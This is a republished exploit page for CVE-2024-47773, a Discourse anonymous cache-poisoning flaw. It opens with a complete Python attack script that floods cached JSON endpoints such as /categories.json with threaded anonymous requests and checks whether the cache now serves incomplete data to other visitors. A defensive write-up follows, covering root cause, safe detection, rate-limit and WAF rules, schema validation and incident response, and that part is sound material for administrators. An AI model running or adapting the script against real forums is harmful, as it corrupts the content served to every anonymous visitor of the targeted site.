Discourse 3.2.x - Anonymous Cache Poisoning

Exploit Author: İbrahimsql Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Python Published Date: 2025-07-08

#!/usr/bin/env python3
"""
Exploit Title: Discourse 3.2.x - Anonymous Cache Poisoning
Date: 2024-10-15
Exploit Author: ibrahimsql
Github: : https://github.com/ibrahmsql
Vendor Homepage: https://discourse.org
Software Link: https://github.com/discourse/discourse
Version: Discourse < latest (patched)
Tested on: Discourse 3.1.x, 3.2.x
CVE: CVE-2024-47773
CVSS: 7.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L)

Description:
Discourse anonymous cache poisoning vulnerability allows attackers to poison
the cache with responses without preloaded data through multiple XHR requests.
This affects only anonymous visitors of the site.

Reference:
https://nvd.nist.gov/vuln/detail/CVE-2024-47773
"""

import requests
import sys
import argparse
import time
import threading
import json
from urllib.parse import urljoin

class DiscourseCachePoisoning:
    def __init__(self, target_url, threads=10, timeout=10):
        self.target_url = target_url.rstrip('/')
        self.threads = threads
        self.timeout = timeout
        self.session = requests.Session()
        self.session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
            'Accept': 'application/json, text/javascript, */*; q=0.01',
            'X-Requested-With': 'XMLHttpRequest'
        })
        self.poisoned = False
        
    def check_target(self):
        """Check if target is accessible and running Discourse"""
        try:
            response = self.session.get(f"{self.target_url}/", timeout=self.timeout)
            if response.status_code == 200:
                if 'discourse' in response.text.lower() or 'data-discourse-setup' in response.text:
                    return True
        except Exception as e:
            print(f"[-] Error checking target: {e}")
        return False
    
    def check_anonymous_cache(self):
        """Check if anonymous cache is enabled"""
        try:
            # Test endpoint that should be cached for anonymous users
            response = self.session.get(f"{self.target_url}/categories.json", timeout=self.timeout)
            
            # Check cache headers
            cache_headers = ['cache-control', 'etag', 'last-modified']
            has_cache = any(header in response.headers for header in cache_headers)
            
            if has_cache:
                print("[+] Anonymous cache appears to be enabled")
                return True
            else:
                print("[-] Anonymous cache may be disabled")
                return False
                
        except Exception as e:
            print(f"[-] Error checking cache: {e}")
            return False
    
    def poison_cache_worker(self, endpoint):
        """Worker function for cache poisoning attempts"""
        try:
            # Create session without cookies to simulate anonymous user
            anon_session = requests.Session()
            anon_session.headers.update({
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
                'Accept': 'application/json, text/javascript, */*; q=0.01',
                'X-Requested-With': 'XMLHttpRequest'
            })
            
            # Make rapid requests to poison cache
            for i in range(50):
                response = anon_session.get(
                    f"{self.target_url}{endpoint}",
                    timeout=self.timeout
                )
                
                # Check if response lacks preloaded data
                if response.status_code == 200:
                    try:
                        data = response.json()
                        # Check for missing preloaded data indicators
                        if self.is_poisoned_response(data):
                            print(f"[+] Cache poisoning successful on {endpoint}")
                            self.poisoned = True
                            return True
                    except:
                        pass
                        
                time.sleep(0.1)
                
        except Exception as e:
            pass
        return False
    
    def is_poisoned_response(self, data):
        """Check if response indicates successful cache poisoning"""
        # Look for indicators of missing preloaded data
        indicators = [
            # Missing or empty preloaded data
            not data.get('preloaded', True),
            data.get('preloaded') == {},
            # Missing expected fields
            'categories' in data and not data['categories'],
            'topics' in data and not data['topics'],
            # Error indicators
            data.get('error') is not None,
            data.get('errors') is not None
        ]
        
        return any(indicators)
    
    def test_cache_poisoning(self):
        """Test cache poisoning on multiple endpoints"""
        print("[*] Testing cache poisoning vulnerability...")
        
        # Target endpoints that are commonly cached
        endpoints = [
            '/categories.json',
            '/latest.json',
            '/top.json',
            '/c/general.json',
            '/site.json',
            '/site/basic-info.json'
        ]
        
        threads = []
        
        for endpoint in endpoints:
            print(f"[*] Testing endpoint: {endpoint}")
            
            # Create multiple threads to poison cache
            for i in range(self.threads):
                thread = threading.Thread(
                    target=self.poison_cache_worker,
                    args=(endpoint,)
                )
                threads.append(thread)
                thread.start()
            
            # Wait for threads to complete
            for thread in threads:
                thread.join(timeout=5)
            
            if self.poisoned:
                break
                
            time.sleep(1)
        
        return self.poisoned
    
    def verify_poisoning(self):
        """Verify if cache poisoning was successful"""
        print("[*] Verifying cache poisoning...")
        
        # Test with fresh anonymous session
        verify_session = requests.Session()
        verify_session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
        })
        
        try:
            response = verify_session.get(f"{self.target_url}/categories.json", timeout=self.timeout)
            
            if response.status_code == 200:
                try:
                    data = response.json()
                    if self.is_poisoned_response(data):
                        print("[+] Cache poisoning verified - anonymous users affected")
                        return True
                    else:
                        print("[-] Cache poisoning not verified")
                except:
                    print("[-] Unable to parse response")
            else:
                print(f"[-] Unexpected response code: {response.status_code}")
                
        except Exception as e:
            print(f"[-] Error verifying poisoning: {e}")
        
        return False
    
    def exploit(self):
        """Main exploit function"""
        print(f"[*] Testing Discourse Cache Poisoning (CVE-2024-47773)")
        print(f"[*] Target: {self.target_url}")
        
        if not self.check_target():
            print("[-] Target is not accessible or not running Discourse")
            return False
        
        print("[+] Target confirmed as Discourse instance")
        
        if not self.check_anonymous_cache():
            print("[-] Anonymous cache may be disabled (DISCOURSE_DISABLE_ANON_CACHE set)")
            print("[*] Continuing with exploit attempt...")
        
        success = self.test_cache_poisoning()
        
        if success:
            print("[+] Cache poisoning attack successful!")
            self.verify_poisoning()
            print("\n[!] Impact: Anonymous visitors may receive responses without preloaded data")
            print("[!] Recommendation: Upgrade Discourse or set DISCOURSE_DISABLE_ANON_CACHE")
            return True
        else:
            print("[-] Cache poisoning attack failed")
            print("[*] Target may be patched or cache disabled")
            return False

def main():
    parser = argparse.ArgumentParser(description='Discourse Anonymous Cache Poisoning (CVE-2024-47773)')
    parser.add_argument('-u', '--url', required=True, help='Target Discourse URL')
    parser.add_argument('-t', '--threads', type=int, default=10, help='Number of threads (default: 10)')
    parser.add_argument('--timeout', type=int, default=10, help='Request timeout (default: 10)')
    
    args = parser.parse_args()
    
    exploit = DiscourseCachePoisoning(args.url, args.threads, args.timeout)
    
    try:
        success = exploit.exploit()
        sys.exit(0 if success else 1)
    except KeyboardInterrupt:
        print("\n[-] Exploit interrupted by user")
        sys.exit(1)
    except Exception as e:
        print(f"[-] Exploit failed: {e}")
        sys.exit(1)

if __name__ == '__main__':
    main()

Discourse 3.2.x — Anonymous Cache Poisoning (CVE-2024-47773)

This article describes the CVE-2024-47773 "anonymous cache poisoning" issue that affected Discourse (notably 3.1.x and 3.2.x at the time of disclosure). It covers the high-level technical root cause, impact, safe detection and verification techniques, mitigation and hardening guidance, and incident response considerations for administrators and security engineers. The goal is to provide defensive, actionable guidance while avoiding step-by-step exploit construction.

Executive summary

CVE: CVE-2024-47773
Severity: CVSS 7.1 (High — integrity impact; network attack surface; no user interaction)
Affected: Discourse instances prior to the upstream patch (reported against 3.1.x, 3.2.x variants)
Impact: Anonymous visitors could receive cached API responses that lack expected "preloaded" data (or containing malformed/missing fields), producing served content with integrity issues for other anonymous clients.
Primary mitigation: Upgrade Discourse to the fixed release(s) or apply recommended configuration changes (e.g., DISCOURSE_DISABLE_ANON_CACHE) and add defensive controls such as rate-limiting and WAF rules for anonymous/XHR endpoints.

Vulnerability at a glance

At a high level, the vulnerability stems from how Discourse served certain JSON endpoints for anonymous visitors and how those responses were cached. Under specific conditions, an unauthenticated client could cause responses without expected preloaded data (or with missing fields) to be cached and subsequently served to other anonymous users. That produced an integrity issue for responses returned to the public (data consistency problems, potential UI breakage, or disclosure/injection-related consequences depending on context).

Technical background (high-level)

Discourse maintains anonymous caching for some endpoints to improve scalability. Anonymous cache entries may be stored and reused across requests.
Some API endpoints supply "preloaded" metadata required by the frontend. If an initial cached response lacks that preloaded data, subsequent anonymous users may receive the incomplete payload.
The issue is not an authentication bypass: it affects only anonymous (non-authenticated) visitors. The primary risk is integrity loss — incorrect or incomplete content delivered to many visitors.
Because the exploit surface uses normal HTTP GET/XHR calls, mitigation focuses on ensuring correct caching behavior, not on fixing a privileged authentication control.

Impact and risk model

The vulnerability's impact depends on the site, its content, and how the frontend uses the JSON payloads. Possible consequences include:

Front-end breakage or partially rendered pages due to missing preloaded data.
Misleading information or UI inconsistencies for anonymous visitors.
In contexts where the missing or malformed data interacts with other frontend logic, it could open secondary issues (e.g., inconsistent state that leads to client-side errors).
Because only anonymous users are affected, risks to authenticated users or data exfiltration are lower; however, public reputation and availability are still at stake.

Vulnerability metadata

Field	Value
CVE	CVE-2024-47773
Product	Discourse
Affected Releases	3.1.x, 3.2.x (as reported)
CVSS	7.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L)
Primary impact	Integrity of cached anonymous responses

Safe detection and verification (what site owners should do)

Administrators should verify whether their instance is vulnerable and whether anonymous cached responses can be poisoned or are malformed. Do this in a controlled, defensive way: query endpoints once or a few times from an isolated test client or a staging instance. Avoid automated high-frequency requests against production that resemble exploitation.

Example: retrieve and inspect anonymous cached endpoint (safe)

curl -s -D - 'https://forum.example.com/categories.json' -H 'User-Agent: security-check/1.0' -o categories.json

This command fetches the /categories.json endpoint and prints response headers while saving the body to categories.json. It is a single benign request — suitable for verifying server type, cache headers (Etag, Cache-Control) and payload structure.

python3 -c "import json,sys; data=json.load(open('categories.json')); print('preloaded' in data, data.get('preloaded') and isinstance(data.get('preloaded'), dict))"

This Python one-liner checks whether the JSON contains a top-level "preloaded" key and whether it looks like a dictionary. Use it to validate that the payload contains expected fields. These checks are non-destructive and intended for administrators to audit response integrity.

What to look for in headers and payloads

Cache-related headers: Cache-Control, ETag, Last-Modified — confirm whether anonymous responses are cached and with which directives.
Payload fields: confirm the presence of expected fields such as "preloaded", "categories", "topics" and that they look reasonable (not empty or null when they should contain data).
Unexpected "errors" or "error" fields in normal GET responses can indicate an issue.

Logging and monitoring checks

Search access logs for unusually high rates of requests to JSON endpoints from single IP addresses or short time windows. That could indicate probing attempts.
Alert on repeated 200 responses with empty/invalid payloads from anonymous endpoints.
Monitor frontend errors (client-side console logs) for spike of rendering errors tied to anonymous users.

Mitigation and hardening guidance

Focus on prompt patching plus layered mitigations to reduce the ability of unauthenticated actors to manipulate cache entries.

Primary remediation

Upgrade Discourse to the vendor-released patched version(s). The upstream Discourse project or your vendor should have released a security patch addressing this CVE. Patching is the recommended primary fix.
If you cannot immediately patch, consider temporarily disabling anonymous caching via configuration options (e.g., DISCOURSE_DISABLE_ANON_CACHE) until you can apply the update. Note: this may increase load on your application and database, so plan capacity accordingly.

Operational controls (defense-in-depth)

Rate-limit anonymous/XHR requests to JSON endpoints — per-IP or per-source limits reduce the speed at which cache entries can be manipulated.
Employ Web Application Firewall (WAF) rules to detect and block suspicious rapid probing patterns to JSON endpoints. Rules should be conservative — avoid blocking legitimate crawlers.
Validate and sanitize JSON payloads in the frontend: if the UI expects preloaded metadata, fail gracefully and log missing data rather than rendering inconsistent state.
Use strict cache-control and vary headers to ensure cached responses include appropriate cache keys. For example, include "Vary" and appropriate Cache-Control directives so that caches do not inadvertently serve a response intended for a different request context.
Consider adding integrity checks on critical JSON responses, e.g., simple schema validation in the backend to avoid returning malformed payloads to caches.

Recommended WAF pseudo-rule (defensive, non-exploit)

# Pseudo-rule: limit the rate of anonymous JSON API calls to common endpoints.
# This is an example for guidance; translate to your WAF/signature language.
IF request.path startswith "/categories.json" OR request.path startswith "/latest.json" OR request.path startswith "/site.json"
AND request has no Authentication header (anonymous)
THEN apply rate-limit 20 requests/minute per IP and log if exceeded

This is a conceptual rule showing how to throttle anonymous access to sensitive JSON endpoints. Implementers must adapt the rule to their WAF and production traffic patterns to avoid false positives.

Incident response and remediation steps

Apply the upstream security patch as soon as it is available and test in staging before production deployment.
If you detect evidence of cache poisoning in production, clear affected caches and rotate any cached representations that may be tainted (e.g., CDN or reverse-proxy caches serving anonymous responses).
Investigate logs for suspicious access patterns and identify any client IP addresses that performed high-rate anonymous JSON access. Take appropriate blocking or throttling actions.
Assess user-facing impacts (broken pages, incorrect information) and prepare customer communications if public-facing content was substantially affected.

Safe code example: simple server-side schema validation (illustrative)

def validate_categories_payload(payload):
    # Defensive check — ensure required keys exist and have correct basic types.
    if not isinstance(payload, dict):
        return False
    if 'preloaded' not in payload:
        return False
    if not isinstance(payload.get('preloaded'), dict):
        return False
    # Additional business rules: categories should be non-empty list for active forums
    if 'categories' in payload and not isinstance(payload['categories'], list):
        return False
    return True

This example shows a minimal defensive function to validate whether a server-side JSON payload contains expected keys and types before caching or returning it. In practice, use a robust JSON schema validation library and integrate checks before responses are cached for reuse by anonymous clients.

Long-term architectural recommendations

Design caching layers with explicit cache validation and strong cache keys. Where frontend state is required, prefer server-side composition that guarantees completeness before caching.
Adopt automated regression tests that assert JSON endpoints contain required fields and do not return error indicators in normal operation.
Maintain a staged rollout and canary testing strategy for changes that affect caching behavior or anonymous API responses.
Keep a documented and tested incident response playbook for cache-related integrity incidents (including cache invalidation and CDN purge procedures).

Summary and takeaways

CVE-2024-47773 highlighted the risks of anonymous caching when responses are not guaranteed to be complete before being stored and shared across clients. The safest remediation is to apply vendor patches. Meanwhile, operators should apply defensive controls — temporary configuration changes, rate-limiting, WAF rules, schema validation, and careful cache invalidation — to reduce risk and detect abuse. Regular security testing and observability into anonymous API endpoints will help reduce the chance of similar issues in the future.

References and further reading

Official NVD entry: CVE-2024-47773 (for CVSS and advisory metadata)
Discourse project repository and official release notes (for patched versions and changelogs)
Operational docs on cache control, CDN invalidation, and WAF configuration from your CDN/WAF vendor